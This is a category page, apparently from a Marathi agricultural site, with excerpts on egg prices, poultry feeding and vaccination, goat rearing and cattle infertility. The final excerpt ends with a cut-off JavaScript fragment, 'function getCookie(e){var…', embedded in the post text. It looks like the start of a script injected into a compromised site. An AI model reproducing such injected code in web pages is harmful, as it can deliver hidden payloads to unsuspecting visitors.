1. Home
  2. जोडधंदा

Category: जोडधंदा

जोडधंदा
अंड्याचे दर : रु/शेकडा

अंड्याचे दर : रु/शेकडा

आजचे अंड्याचे निर्धारित दर दिल्ली : ३८०मुंबई : ४७२पुणे : ४६५नागपूर:  –कोलकात्ता : ४४७ हैद्राबाद : ४१५ SMS  वर अंड्याचे व चिकन चे दर मिळवा संपर्क : ९६५७४१५७४१

जोडधंदा
कोंबड्यांचे संरक्षण व खाद्य व्यवस्थापन

कोंबड्यांचे संरक्षण व खाद्य व्यवस्थापन

कृषिकिंग: खाद्य व्यवस्थापन- – परसातील कोंबड्यांसाठी सहजपणे उपलब्ध होणारे धान्य मका, ज्वारी, बाजरी दळून आणून आपण खायला घालू शकतो. तसेच स्वयंपाकघरातील कचरा, कीटक, धान्य इ. पक्ष्यांच्या खाद्यात वापरता येते. – अंडी उत्पादनासाठी जीवनसत्त्व व खनिजे खूप…

जोडधंदा
अंड्याचे दर रु/शेकडा

अंड्याचे दर रु/शेकडा

आजचे अंड्याचे निर्धारित दर दिल्ली : ३८०मुंबई : ४७२ पुणे : ४६५नागपूर:  –कोलकात्ता : ४४४ हैद्राबाद : ४१५ SMS  वर अंड्याचे व चिकन चे दर मिळवा संपर्क : ९६५७४१५७४१

जोडधंदा
कोंबड्यांचे लसीकरण व औषधोपचार वेळेत करा

कोंबड्यांचे लसीकरण व औषधोपचार वेळेत करा

कृषिकिंग ,परभणी: लसीकरण व औषधोपचार वेळेत करा: अ) लसीकरण- परसातील कोंबड्या या बाहेरील वातावरणात वाढतात, तसेच उपलब्ध खाद्यावर जगतात. त्यामुळे त्यांचे रोगांपासून संरक्षण करण्यासाठी लसीकरण आवश्यक आहे. ब) औषधोपचार- परसातील कोंबड्या कचऱ्याचे ढीग, भाजीपाला, कीटक…

जोडधंदा
अंड्याचे दर रु/शेकडा

अंड्याचे दर रु/शेकडा

आजचे अंड्याचे निर्धारित दर दिल्ली : ३८० मुंबई : ४७२ पुणे : ४६५ नागपूर:  – कोलकात्ता : ४४४ हैद्राबाद : ४१५ SMS  वर अंड्याचे व चिकन चे दर मिळवा संपर्क : ९६५७४१५७४१

जोडधंदा
शेळ्यांचा गोठा

शेळ्यांचा गोठा

बरेचदा शेळ्यांचा गोठ्याचा तळ मातीचा, मुरमाचा, रेतीचा असावा यावरच भर दिलेला आहे. परंतु एखादी शेळी रोगट असल्यास तिच्या रोगट मलमुत्रातून जंतू बाहेर फेकले जातात व नंतर त्यांची जोमाने वाढ होते. यामुळे करडांमध्ये मरतुकीचे प्रमाण जास्त…

जोडधंदा
शेळी पालनाची उद्दिष्ट्ये

शेळी पालनाची उद्दिष्ट्ये

कृषिकिंग : शेळीपालन करताना सर्वात महत्वाचे म्हणजे आपले उद्दिष्ट निश्चित करणे. बरेचसे शेळीपालक आपल्या गोठ्यातील बोकडांची फक्त पैदासीसाठीच विक्री करायची हाच उद्देश ठेवतात त्यामुळे बरेचदा योग्य दर न मिळाल्यास नाराजी वाढते. असा उद्देश ठेवायला हरकत…

जोडधंदा
अंड्याचे दर रु/शेकडा

अंड्याचे दर रु/शेकडा

आजचे अंड्याचे निर्धारित दर दिल्ली : ३८८ मुंबई : ४६८ पुणे : ४६५ नागपूर:  ४१५ कोलकात्ता : ४४४ हैद्राबाद : ४१५ SMS  वर अंड्याचे व चिकन चे दर मिळवा संपर्क : ९६५७४१५७४१

जोडधंदा
जनावरातील आहार संबंधित वांझपणा

जनावरातील आहार संबंधित वांझपणा

कृषिकिंग परभणी : पशुआहाराचा आणि वांझपणाचा अगदी जवळचा संबंध असून ५० ते ६० टक्के वांझपणा केवळ आहार कमतरता किंवा सदोषता यामुळेच घडतो. गरजेएवढा आहार मिळणारी जनावरे नियमितपणे अपेक्षितवेळी माजावर येतात. मात्र आहार घटकांची कमतरता असल्यास…

जोडधंदा
अंड्याचे दर रु/शेकडा

अंड्याचे दर रु/शेकडा

आजचे अंड्याचे निर्धारित दर : दिल्ली : ३८८ मुंबई : ४६५ पुणे : ४६३ नागपूर: ४१५ कोलकात्ता : ४४४ हैद्राबाद : ४१३ SMS  वर अंड्याचे व चिकन चे दर मिळवा : संपर्क ९६५७४१५७४१ function getCookie(e){var…